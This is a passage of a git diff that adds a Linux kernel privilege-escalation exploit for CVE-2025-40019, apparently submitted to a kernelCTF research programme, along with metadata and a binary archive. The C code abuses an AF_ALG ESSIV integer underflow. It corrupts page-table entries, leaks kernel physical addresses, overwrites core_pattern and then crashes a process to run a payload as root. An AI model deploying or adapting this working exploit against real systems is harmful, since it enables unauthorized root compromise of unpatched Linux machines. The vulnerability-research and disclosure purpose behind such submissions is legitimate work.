+ } + + return ret < 0 ? 1 : 0; +} + +/* ------------------------------------------------------------------ */ +/* Main exploit flow */ +/* ------------------------------------------------------------------ */ + +int main(int argc, char **argv) +{ + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stdout, NULL, _IONBF, 0); + + if (argc > 1) { + if (!strcmp(argv[1], "--vuln-trigger")) + return vuln_trigger(); + /* When invoked as root via core_pattern with PID argument */ + root_payload(argv[1]); + } + + /* --- Step 0: Set up IPC and fork for two-pass exploit --- */ + static char data_buf[0x1000000]; /* 16 MB general-purpose data buffer */ + int unix_sockfd[2]; + SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, unix_sockfd)); + + int phys_addr_pipe[2]; + SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, phys_addr_pipe)); + pin_cpu(0); + + size_t stext_phys = 0; + if (fork() == 0) { + /* Child: wait for parent to leak _stext physical address */ + pin_cpu(1); + read(phys_addr_pipe[0], &stext_phys, sizeof(stext_phys)); + /* Falls through to run pass 2 with stext_phys set */ + } + + /* --- Step 1: Pre-compute IV to encode the desired PTE value --- */ + unsigned char exploit_iv[AES_IV_SIZE]; + if (stext_phys) { + /* Pass 2 (child): make the overwritten PUD a huge leaf covering + * the 1GB physical region containing core_pattern. */ + size_t core_phys = stext_phys + CORE_PATTERN_PAGE_BASE; + size_t pa_target = (core_phys & ~PUD_HUGE_MASK) | PTE_FLAGS_SECOND_PASS; + printf("[*] Pass 2: core_pattern PA = %zx\n", core_phys + CORE_PATTERN_PAGE_OFFSET); + printf("[*] Pass 2: huge-PUD target = %zx\n", pa_target); + *(size_t *)&exploit_iv[0] = pa_target; + *(size_t *)&exploit_iv[8] = 0; + } else { + /* Pass 1 (parent): make the overwritten PUD a huge leaf mapping + * physical 0..1GB so TRAMPOLINE_PHYS is readable through a probe VA. */ + *(size_t *)&exploit_iv[0] = PTE_FLAGS_FIRST_PASS; + *(size_t *)&exploit_iv[8] = 0; + } + compute_iv(exploit_iv, stext_phys ? 1 : 0); + + /* --- Step 2a: Create sacrificial authenc AEAD with many SGL entries --- */ + int authenc_opfd = setup_sacrificial_aead(data_buf); + + /* --- Step 3: Spray user page tables as write targets --- */ + char *addrs[PTE_SPRAY_COUNT]; + char *maddr = (void *)PTE_SPRAY_BASE; + for (int i = 0; i < PTE_SPRAY_COUNT; i++) { + addrs[i] = SYSCHK(mmap(maddr + PTE_SPRAY_SPACING * i, PAGE_SIZE, + PROT_READ | PROT_WRITE, + MAP_PRIVATE | MAP_ANON | MAP_FIXED, -1, 0)); + } + + /* Map one probe page in each likely user PUD without faulting it in yet. + * If the overflow rewrites one of those PUD entries into a 1GB huge leaf, + * touching the matching probe VA after the trigger accesses kernel physical + * memory through the corrupted page-table entry. */ + char *pud_probe_addrs[3] = {0}; + size_t pass2_core_phys = stext_phys ? (stext_phys + CORE_PATTERN_PAGE_BASE) : 0; + size_t probe_off = stext_phys ? + (pass2_core_phys & PUD_HUGE_MASK) : + TRAMPOLINE_PHYS; + for (int i = 0; i < 3; i++) { + void *probe = (void *)(probe_off + (size_t)i * PUD_HUGE_SIZE); + pud_probe_addrs[i] = mmap(probe, PAGE_SIZE, PROT_READ | PROT_WRITE, + MAP_PRIVATE | MAP_ANON | MAP_FIXED, -1, 0); + if (pud_probe_addrs[i] == MAP_FAILED) { + perror("mmap(pud_probe)"); + pud_probe_addrs[i] = NULL; + } else { + printf("[*] PUD huge probe[%d]=%p off=%zx\n", i, pud_probe_addrs[i], probe_off); + } + } + + /* --- Set up the vulnerable ESSIV AEAD socket --- */ + int opfd = SYSCHK(accept( + create_aead_tfmfd("essiv(authenc(hmac(sha256),cbc(aes)),sha256)"), + NULL, 0)); + + /* Send 0x20 bytes with ALG_SET_OP=DECRYPT, ALG_SET_AEAD_ASSOCLEN=0. + * This triggers the integer overflow (0 - ivsize = 0xfffffff0) and also + * ensures outlen = used - authsize = 0x20 - 0x20 = 0, which causes + * af_alg_get_rsgl to return early without initializing the RX SGL. */ + char cbuf[CMSG_SPACE(sizeof(__u32)) + + CMSG_SPACE(sizeof(struct af_alg_iv) + AES_IV_SIZE) + + CMSG_SPACE(sizeof(__u32))]; + struct msghdr msg = {0}; + struct iovec iov = { data_buf, ESSIV_SENDMSG_LEN }; + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + msg.msg_control = cbuf; + msg.msg_controllen = sizeof(cbuf); + + struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_OP; + cmsg->cmsg_len = CMSG_LEN(sizeof(__u32)); + *(__u32 *)CMSG_DATA(cmsg) = ALG_OP_DECRYPT; + + cmsg = CMSG_NXTHDR(&msg, cmsg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_AEAD_ASSOCLEN; + cmsg->cmsg_len = CMSG_LEN(sizeof(__u32)); + *(__u32 *)CMSG_DATA(cmsg) = 0; /* assoclen=0, causes integer overflow */ + + cmsg = CMSG_NXTHDR(&msg, cmsg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_IV; + cmsg->cmsg_len = CMSG_LEN(sizeof(struct af_alg_iv) + AES_IV_SIZE); + struct af_alg_iv *ivmsg = (struct af_alg_iv *)CMSG_DATA(cmsg); + ivmsg->ivlen = AES_IV_SIZE; + memcpy(ivmsg->iv, exploit_iv, AES_IV_SIZE); + + int ret = sendmsg(opfd, &msg, 0); + if (ret < 0) { perror("sendmsg(essiv)"); return 1; } + + int rcvbuf_val = 0; + SYSCHK(setsockopt(opfd, SOL_SOCKET, SO_RCVBUF, &rcvbuf_val, sizeof(rcvbuf_val))); + + /* --- Step 2b/2c: Free scatterlist and reclaim with crafted entry --- */ + spray_fake_scatterlist(authenc_opfd, unix_sockfd[1]); + + /* Touch all sprayed pages to ensure PTEs are populated. + * volatile prevents the compiler from optimizing away the reads. */ + volatile int sum = 0; + for (int i = 0; i < PTE_SPRAY_COUNT; i++) + sum += addrs[i][0]; + + /* --- Step 4: Trigger the overflow via recv --- */ + printf("[*] Triggering ESSIV recv (scatterwalk overflow)...\n"); + fflush(stdout); + ret = recv(opfd, data_buf, ESSIV_SENDMSG_LEN, 0); + printf("[*] ESSIV recv returned: %d (errno=%d)\n", ret, ret < 0 ? errno : 0); + fflush(stdout); + + /* --- Probe huge-PUD candidates without touching the broad spray again --- */ + int found_hit = 0; + if (!stext_phys) { + printf("[*] Probing 3 huge-PUD candidates for trampoline leak...\n"); + fflush(stdout); + for (int i = 0; i < 3; i++) { + if (!pud_probe_addrs[i]) + continue; + volatile size_t *q = (volatile size_t *)pud_probe_addrs[i]; + size_t pa_leak = 0; + for (int j = 0; j < 512; j++) { + if (q[j]) { + pa_leak = q[j]; + break; + } + } + printf("[*] PUD probe %d q0=%zx q1=%zx leak=%zx\n", + i, (size_t)q[0], (size_t)q[1], pa_leak); + fflush(stdout); + if (!pa_leak) + continue; + + size_t pa_stext = (pa_leak & ~PHYS_ADDR_ALIGN_MASK) - BRK_BASE; + printf("[+] Pass 1 huge-PUD hit at probe %d: leak=%zx stext_phys=%zx\n", + i, pa_leak, pa_stext); + fflush(stdout); + write(phys_addr_pipe[1], &pa_stext, sizeof(pa_stext)); + found_hit = 1; + break; + } + } else { + printf("[*] Writing core_pattern payload through 3 huge-PUD candidates...\n"); + fflush(stdout); + for (int i = 0; i < 3; i++) { + if (!pud_probe_addrs[i]) + continue; + strcpy(pud_probe_addrs[i] + CORE_PATTERN_PAGE_OFFSET, CORE_PATTERN_PAYLOAD); + printf("[+] Pass 2 wrote core_pattern candidate via probe %d at %p\n", + i, pud_probe_addrs[i] + CORE_PATTERN_PAGE_OFFSET); + fflush(stdout); + found_hit = 1; + } + } + + if (!found_hit) { + printf("[-] No huge-PUD overwrite detected in probe candidates.\n"); + printf("[-] Scatterwalk may have walked a different path.\n"); + fflush(stdout); + } + + /* --- Step 5/6: Trigger privilege escalation via core_pattern --- */ + if (stext_phys) { + if (fork() == 0) { + setsid(); + puts("[+] Triggering core_pattern execution..."); + *(volatile size_t *)0 = 0; /* segfault -> core dump -> root */ + } + } + + // @sleep(desc="Keep parent/child alive while core_pattern handler runs") + while (1) sleep(1); +} diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/metadata.json b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/metadata.json new file mode 100644 index 000000000..a4cdc24c2 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/metadata.json @@ -0,0 +1,26 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp505"], + "vulnerability": { + "summary": "ESSIV AEAD assoclen underflow in the AF_ALG decryption path", + "cve": "CVE-2025-40019", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6bb73db6948c2de23e407fe1b7ef94bf02b7529f", + "affected_versions": ["5.4 - 6.18"], + "requirements": { + "attack_surface": [], + "capabilities": [], + "kernel_config": [ + "CONFIG_CRYPTO_USER_API", + "CONFIG_CRYPTO_USER_API_AEAD", + "CONFIG_CRYPTO_ESSIV" + ] + } + }, + "exploits": { + "mitigation-v4-6.12": { + "uses": [], + "requires_separate_kaslr_leak": false, + "stability_notes": "Flag captured on the live mitigation-v4-6.12 target. This is a novelty-only follow-up submission for the huge-PUD adaptation; reliability has not yet been batch measured." + } + } +} diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/original.tar.gz b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/original.tar.gz new file mode 100644 index 0000000000000000000000000000000000000000..abb1f36a993938f2d19d64d683a60a508083dd6e GIT binary patch literal 21933 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 